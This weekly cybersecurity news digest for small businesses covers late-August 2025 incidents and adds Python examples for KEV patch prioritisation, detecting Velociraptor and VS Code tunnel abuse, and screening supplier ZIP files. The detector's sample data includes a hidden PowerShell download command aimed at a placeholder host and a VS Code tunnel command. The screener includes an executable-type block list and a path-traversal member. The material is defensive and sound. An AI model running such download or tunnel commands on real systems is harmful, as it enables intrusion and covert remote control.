
This Week's Cybersecurity Incidents – 24/08/2025 to 31/08/2025
Salt Typhoon Campaign Compromises 600 Organisations Across the Globe
The China-linked threat group Salt Typhoon has exploited vulnerabilities in edge and network devices to compromise as many as 600 organisations globally, including UK critical infrastructure, telecoms and government services. The campaign shows how attackers pursue long-term persistence through device-level vulnerabilities rather than through the endpoints behind them. In response, CISA and partner agencies worldwide advised patching known exploited vulnerabilities immediately and disabling unused remote access, and organisations are scanning for exposed devices and hardening perimeter defences. The implication for SMBs is that they are just as vulnerable, since they run the same third-party VPN appliances and routers, and supply-chain relationships mean even a small firm can be a stepping-stone to a larger target. Expect more scrutiny of vendor patch velocity and supply-chain cyber hygiene.
Sources: (Reuters) (BleepingComputer) (CISA Advisory)
WhatsApp Zero-Click Vulnerability Fixed – Business Users Affected
Meta has patched a zero-click vulnerability (CVE-2025-55177) in WhatsApp and WhatsApp Business that was chained with an Apple OS vulnerability to install spyware on fewer than 200 targeted victims. Although not widespread, the flaw affected both consumer and business users. Meta and Apple released out-of-band emergency patches and advised all iOS and macOS users to update immediately; SMBs that use WhatsApp Business for client communications were urged to enforce patch compliance and device security. The broader implication is that zero-click exploits in messaging apps widen the attack surface for SMBs that treat consumer-grade applications as business-critical, and regulators will likely push for safer business messaging alternatives.
Sources: (TechCrunch) (The Hacker News) (WhatsApp Advisory)
CISA Adds Several Exploited Vulnerabilities to KEV Catalogue
On 25–26 August, CISA added new entries to its Known Exploited Vulnerabilities (KEV) catalogue and issued ICS advisories. The additions cover actively exploited vulnerabilities in networking devices and enterprise applications. US federal agencies, and organisations in regulated sectors that follow the same baseline, must remediate KEV entries within the due dates CISA sets, and security teams are matching their asset inventories against the catalogue. For SMBs, the KEV list remains a free "must-patch-now" guide: it matters most for small IT teams that cannot keep up with every vulnerability but must prioritise the ones currently being weaponised.
Sources: (CISA KEV) (US-CERT)
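The KEV-matching step above, and the Salt Typhoon advice to patch exploited edge-device flaws first, come down to the same check: which assets carry a CVE that is on the catalogue, and by when must each be fixed. The following added example (not code from CISA or from the original page) parses the KEV feed's JSON format into a lookup and ranks an asset inventory by CISA due date, with overdue and ransomware-linked entries surfaced first. The feed sample and the inventory are constructed, and the CVE-2099-* identifiers are placeholders rather than real CVEs.

```python
"""Cross-reference an asset inventory with the CISA KEV catalogue.

Added example; it is not code from CISA or from the original page. The feed
sample and inventory below are constructed, and the CVE-2099-* identifiers
are placeholders, not real CVEs.
"""
import json
from dataclasses import dataclass
from datetime import date

# Live feed (not fetched here so the example runs offline).
KEV_FEED_URL = ("https://www.cisa.gov/sites/default/files/feeds/"
                "known_exploited_vulnerabilities.json")

# Constructed sample using the real feed's field names.
SAMPLE_KEV_JSON = json.dumps({
    "catalogVersion": "2025.08.26",
    "vulnerabilities": [
        {"cveID": "CVE-2099-0001", "vendorProject": "ExampleNet",
         "product": "Edge VPN Gateway", "dateAdded": "2025-08-25",
         "dueDate": "2025-09-15", "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2099-0002", "vendorProject": "ExampleSoft",
         "product": "Helpdesk Portal", "dateAdded": "2025-08-26",
         "dueDate": "2025-09-16", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2099-0003", "vendorProject": "ExampleNet",
         "product": "Branch Router", "dateAdded": "2025-05-01",
         "dueDate": "2025-05-22", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory, as a scanner or CMDB export might look.
SAMPLE_INVENTORY = [
    {"asset": "vpn-gw-01", "cves": ["CVE-2099-0001", "CVE-2099-9999"]},
    {"asset": "helpdesk-web", "cves": ["CVE-2099-0002"]},
    {"asset": "branch-rtr-03", "cves": ["CVE-2099-0003"]},
    {"asset": "file-srv", "cves": ["CVE-2099-8888"]},  # nothing on KEV
]


@dataclass
class Finding:
    asset: str
    cve_id: str
    vendor: str
    product: str
    due: date
    ransomware: bool   # CISA has seen the flaw used in ransomware campaigns
    overdue: bool      # past CISA's remediation due date as of "today"


def load_kev(feed_text: str) -> dict[str, dict]:
    """Index the KEV feed by CVE ID; extra fields in the real feed are kept."""
    return {v["cveID"]: v for v in json.loads(feed_text)["vulnerabilities"]}


def match_inventory(kev: dict[str, dict], inventory: list[dict],
                    today_iso: str) -> list[Finding]:
    """Return the inventory CVEs that appear in KEV, earliest due date first,
    with ransomware-linked entries ahead of others on the same date."""
    today = date.fromisoformat(today_iso)
    findings = []
    for asset in inventory:
        for cve_id in asset["cves"]:
            entry = kev.get(cve_id)
            if entry is None:
                continue  # not known-exploited: normal patch cadence applies
            due = date.fromisoformat(entry["dueDate"])
            findings.append(Finding(
                asset=asset["asset"], cve_id=cve_id,
                vendor=entry["vendorProject"], product=entry["product"],
                due=due,
                ransomware=entry.get("knownRansomwareCampaignUse") == "Known",
                overdue=due < today))
    findings.sort(key=lambda f: (f.due, not f.ransomware))
    return findings


def report(findings: list[Finding]) -> str:
    """One line per finding, in remediation order."""
    lines = []
    for f in findings:
        status = "OVERDUE" if f.overdue else f"due {f.due.isoformat()}"
        tag = " [ransomware use known]" if f.ransomware else ""
        lines.append(f"{f.asset}: {f.cve_id} ({f.vendor} {f.product}) {status}{tag}")
    return "\n".join(lines)


if __name__ == "__main__":
    kev = load_kev(SAMPLE_KEV_JSON)
    print(report(match_inventory(kev, SAMPLE_INVENTORY, "2025-08-31")))
```

To run this against the live catalogue, fetch KEV_FEED_URL and pass the response body to load_kev; the feed is updated frequently, so cache it and compare the catalogVersion field before re-running the match.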
Legitimate Tools Weaponised: Velociraptor and VS Code Used for C2
Threat actors have been using the open-source forensic tool Velociraptor to deploy Visual Studio Code and use it as a covert command-and-control (C2) channel, letting their traffic blend in with normal administrative activity. Defenders are responding by tightening detection of abnormal tool usage and monitoring for out-of-place VS Code execution, for example on servers where no developer tooling belongs. Expect greater abuse of legitimate admin tools, with detection increasingly depending on behavioural analytics rather than signature-based techniques. For SMBs, an outsourced MDR provider can be a critical component in catching this kind of abuse.
Sources: (The Hacker News)
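Out-of-place VS Code execution is easiest to catch with a few behavioural rules over process-creation telemetry. The following is an added example written for this page, not code from Velociraptor, Microsoft or the original article: it runs three such rules over constructed Sysmon-style events. It assumes the Velociraptor client binary keeps its default name on disk and that hosts are tagged with a role; the tunnel subcommand is how VS Code opens an outbound Remote Tunnel, which is why its appearance on a server is the strongest signal here.

```python
"""Behavioural rules for Velociraptor / VS Code abuse over process events.

Added example, not code from the original page or from the Velociraptor or
VS Code projects. Events are constructed; host roles and the Velociraptor
binary name are assumptions about the environment.
"""
import re

VSCODE_NAMES = {"code.exe", "code"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# Assumption: the Velociraptor client keeps its default binary name.
VELOCIRAPTOR_NAMES = {"velociraptor.exe", "velociraptor"}

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
SAMPLE_EVENTS = [
    {"host": "dev-laptop-07", "role": "workstation", "user": "alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe" C:\src\app'},
    {"host": "file-srv", "role": "server", "user": "SYSTEM",
     "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c Invoke-WebRequest -Uri https://example.invalid/code.zip -OutFile C:\ProgramData\code.zip"},
    {"host": "file-srv", "role": "server", "user": "SYSTEM",
     "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "image": r"C:\ProgramData\code\code.exe",
     "cmdline": r"C:\ProgramData\code\code.exe tunnel --accept-server-license-terms --name file-srv"},
    {"host": "file-srv", "role": "server", "user": "SYSTEM",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(events: list[dict]) -> list[dict]:
    """Apply three behavioural rules to each event and return the alerts."""
    alerts = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent"])
        cmd = ev["cmdline"]
        # R1: VS Code started with the `tunnel` subcommand opens an outbound
        # Remote Tunnel a remote operator can attach to. High fidelity wherever
        # Remote Tunnels are not a sanctioned workflow.
        if image in VSCODE_NAMES and re.search(r"\btunnel\b", cmd):
            alerts.append({"host": ev["host"], "rule": "vscode-tunnel",
                           "severity": "high", "detail": cmd})
        # R2: developer tooling executing on a host with no developer role.
        if image in VSCODE_NAMES and ev["role"] != "workstation":
            alerts.append({"host": ev["host"], "rule": "vscode-on-server",
                           "severity": "medium", "detail": ev["image"]})
        # R3: the Velociraptor client spawning a script host or VS Code.
        # Velociraptor legitimately launches collection artifacts, so tune
        # this against the artifacts your deployment actually runs.
        if parent in VELOCIRAPTOR_NAMES and (image in SCRIPT_HOSTS or image in VSCODE_NAMES):
            alerts.append({"host": ev["host"], "rule": "velociraptor-spawn",
                           "severity": "high", "detail": f"{parent} -> {image}"})
    return alerts


def summarize(alerts: list[dict]) -> dict[str, int]:
    """Alert count per host, for a quick triage view."""
    counts: dict[str, int] = {}
    for a in alerts:
        counts[a["host"]] = counts.get(a["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'{a["severity"]:6} {a["host"]:14} {a["rule"]:18} {a["detail"]}')
    print(summarize(detect(SAMPLE_EVENTS)))
```

On a real fleet, R2 needs a role source (CMDB or directory OU), and R3 needs tuning to the collection artifacts your Velociraptor deployment actually launches; R1 is close to binary on any host where Remote Tunnels are not an approved workflow.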
MixShell Malware Distributed Through Manufacturer Contact Forms
Researchers described a new campaign that distributes malware through supplier and manufacturer web contact forms, shifting the social-engineering channel from phishing emails to business portals that staff regard as safe. Victims who downloaded documents received through these supplier exchanges unknowingly executed MixShell payloads. Manufacturers are responding by hardening webform validation, and security firms advise SMBs to treat unsolicited supplier documents with caution. As supply-chain compromise continues to evolve, SMBs should review how incoming documents are handled; expect growing investment in secure document gateways and stronger supplier authentication.
Sources: (Security Affairs)
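For incoming document processing, one first-pass control that needs no sandbox is screening supplier archives before anyone opens them. The following added example (written for this page, not from the researchers or the original article) assumes the document arrives as a ZIP and quarantines members that are executables or shortcuts, macro-enabled Office files, nested archives, decoy double extensions such as Invoice.pdf.lnk, or paths that escape the extraction directory. The archives it screens are constructed in memory; it complements rather than replaces antivirus and sandbox detonation.

```python
"""Screen a supplier-supplied ZIP before anyone opens it.

Added example, not code from the original page. The archives below are
constructed in memory; the extension lists are a reasonable starting policy,
not a complete one.
"""
import io
import zipfile
from pathlib import PurePosixPath

# File types that should never arrive from a supplier as a "document".
EXECUTABLE_EXTS = {"lnk", "exe", "scr", "dll", "msi", "js", "jse", "vbs", "vbe",
                   "wsf", "hta", "bat", "cmd", "ps1", "iso", "img", "vhd"}
# Macro-enabled Office formats: route through a separate review path.
MACRO_EXTS = {"docm", "xlsm", "pptm", "dotm", "xltm"}
# Extensions used as a decoy in front of the real one (Invoice.pdf.lnk).
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
NESTED_ARCHIVE_EXTS = {"zip", "7z", "rar"}


def screen_name(name: str) -> list[str]:
    """Return the reasons a single archive member should be quarantined."""
    reasons = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable type .{ext}")
    if ext in MACRO_EXTS:
        reasons.append(f"macro-enabled document .{ext}")
    if ext in NESTED_ARCHIVE_EXTS:
        reasons.append("nested archive")
    if len(parts) > 2 and parts[-2] in DECOY_EXTS and ext not in DECOY_EXTS:
        reasons.append("double extension")
    # Zip Slip: members that would land outside the extraction directory.
    p = PurePosixPath(name.replace("\\", "/"))
    if p.is_absolute() or ".." in p.parts:
        reasons.append("path traversal")
    return reasons


def screen_archive(data: bytes) -> dict:
    """Screen a ZIP received as an attachment; returns verdict and findings."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = screen_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return {"verdict": "quarantine" if findings else "allow", "findings": findings}


def build_sample(members: dict[str, bytes]) -> bytes:
    """Constructed in-memory archive for the example (nothing touches disk)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed samples: an "RFQ" with a disguised shortcut, and a clean one.
SUSPICIOUS_ZIP = build_sample({
    "RFQ-2025-08/Invoice.pdf.lnk": b"placeholder, not a real shortcut",
    "RFQ-2025-08/Drawing.docx": b"placeholder",
    "../../Users/Public/startup.bat": b"placeholder",
})
CLEAN_ZIP = build_sample({
    "RFQ-2025-08/Drawing.docx": b"placeholder",
    "RFQ-2025-08/Terms.pdf": b"placeholder",
})

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_ZIP), ("clean", CLEAN_ZIP)):
        print(label, screen_archive(blob))
```

Wire screen_archive in front of wherever the webform or mailbox drops supplier files; an "allow" verdict only means nothing obvious was found, so the archive should still go through the normal antivirus and sandbox path.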
Massive Nevada Cyberattack Triggers Federal & State Response
A large-scale cyberattack in Nevada triggered a coordinated federal and state incident response. The attack disrupted multiple regional services, demonstrating the operational impact of a major intrusion. US authorities deployed rapid-response teams while affected organisations worked to restore core services. The incident highlights the very real cost of downtime and is feeding policy discussions about mandatory resilience practices for public and private organisations.
Sources: (CISA) (State of Nevada Advisory)
AI-Enabled Fraud & Agentic Attacks Increase
Security professionals report a surge in criminals using AI to automate attacks, develop malware and perform reconnaissance. "Agentic" attacks, in which malicious AI agents operate semi-autonomously, are an emerging frontier. Security vendors are releasing AI-driven defence products, but SMBs are slow to adopt them because of cost and complexity. Because AI lowers the technical barrier for attackers, SMBs are more exposed to convincing fraud campaigns; employee vigilance and layered defences remain essential.
Sources: (Dark Reading) (Wired)
UK Policy Debate: Ban on Ransomware Payments Gains Momentum
The UK government intensified its push to prohibit ransomware payments by the public sector and critical infrastructure operators. Experts caution that a ban could redirect attackers towards private SMBs, which are seen as softer targets. Insurers and trade bodies urge SMBs to implement foundational ransomware resilience: prompt patching, MFA and verifiably offline backups. If payments become illegal in certain sectors, SMEs can expect more campaigns directed at them, and rising insurance costs and regulation will continue to turn cyber hygiene into a baseline requirement.
Sources: (The Times) (Infosecurity Magazine)
Summary of the week's incidents:

Incident | Type | Region | Sector | Notes
--- | --- | --- | --- | ---
Salt Typhoon campaign | APT / Device exploitation | Global (incl. UK) | Telecoms / Govt / Critical Infra | 600 orgs breached via network devices
WhatsApp zero-click exploit | Zero-click spyware | Global | SMB / Messaging | Targeted <200 users, includes WhatsApp Business
CISA KEV additions | Exploited vulnerabilities | US / Global | IT / ICS | Actively exploited flaws prioritised
Velociraptor & VS Code misuse | Tool abuse / C2 | Global | Enterprise / SMB | Admin tools turned into covert C2
MixShell malware | Supply-chain / Social engineering | Global | Manufacturing / SMB | Malware via supplier contact forms
Nevada cyberattack | Regional disruption | US | State / Local govt | Triggered federal-state response
AI-enabled attacks | Fraud / Reconnaissance | Global | SMB / Finance | AI agents automating phishing & malware
UK ransomware policy debate | Regulatory shift | UK | Public sector / SMB | Payment bans may shift targeting to SMEs
SMB-Targeted Alerts
- SMBs must patch edge devices promptly – Salt Typhoon shows even small firms can be gateways into larger ecosystems.
- Messaging security is critical – the WhatsApp Business exploit shows consumer apps need enterprise controls.
- Prepare for ransomware shifts – If UK public sector payments are banned, SMEs might become prime targets.
Conclusion
This week's activity underscores the global reach of cyberattacks, from nation-state espionage to AI-aided phishing. For UK and global SMBs, the practical takeaway is straightforward: patch edge devices, secure messaging platforms, verify backups, and train employees. The confluence of policy changes, adversary creativity, and expanding supply-chain threats will make resilience planning unavoidable for smaller organisations.
Provided by Cyber Padlocking